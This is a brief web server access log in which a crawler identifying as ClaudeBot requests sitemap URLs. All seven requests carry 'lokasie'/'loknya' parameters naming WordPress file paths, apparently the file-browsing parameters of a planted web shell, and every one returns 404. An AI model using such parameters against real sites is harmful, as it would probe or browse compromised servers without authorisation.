216.73.216.117 - - [21/Jul/2026:12:24:10 +0000] "GET /sitemap-5.xml?lokasie=%2Fhome%2Fvmxfzbqj%2Fpublic_html%2Fwp-includes%2Fclass-walker-page.php&loknya=%2Fhome%2Fvmxfzbqj%2Fpublic_html%2Fwp-includes HTTP/2" 404 3706 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.117 - - [21/Jul/2026:12:24:13 +0000] "GET /sitemap-17.xml?lokasie=%2Fhome%2Fvmxfzbqj%2Fpublic_html%2Fwp-includes%2Fclass-wp-roles.php&loknya=%2Fhome%2Fvmxfzbqj%2Fpublic_html%2Fwp-includes HTTP/2" 404 4173 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.117 - - [21/Jul/2026:12:24:16 +0000] "GET /sitemap-19.xml?lokasie=%2Fhome%2Fvmxfzbqj%2Fpublic_html%2Fwp-includes%2Fms-deprecated.php&loknya=%2Fhome%2Fvmxfzbqj%2Fpublic_html%2Fwp-includes HTTP/2" 404 8175 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.117 - - [21/Jul/2026:12:24:19 +0000] "GET /sitemap-13.xml?lokasie=%2Fhome%2Fvmxfzbqj%2Fpublic_html%2Fwp-includes%2Fclass-wp-roles.php&loknya=%2Fhome%2Fvmxfzbqj%2Fpublic_html%2Fwp-includes HTTP/2" 404 4173 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.117 - - [21/Jul/2026:12:24:22 +0000] "GET /sitemap-5.xml?lokasie=%2Fhome%2Fvmxfzbqj%2Fpublic_html%2Fwp-includes%2Fms-blogs.php&loknya=%2Fhome%2Fvmxfzbqj%2Fpublic_html%2Fwp-includes HTTP/2" 404 8495 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.117 - - [21/Jul/2026:12:24:25 +0000] "GET /sitemap-5.xml?lokasie=%2Fhome%2Fvmxfzbqj%2Fpublic_html%2Fwp-admin%2Flink-parse-opml.php&loknya=%2Fhome%2Fvmxfzbqj%2Fpublic_html%2Fwp-admin HTTP/2" 404 2565 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.117 - - [21/Jul/2026:12:23:29 +0000] "GET /sitemap.xml?lokasie=%2Fhome%2Fvmxfzbqj%2Fpublic_html%2Fwp-includes%2Fclass-avif-info.php&loknya=%2Fhome%2Fvmxfzbqj%2Fpublic_html%2Fwp-includes HTTP/2" 404 8081 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
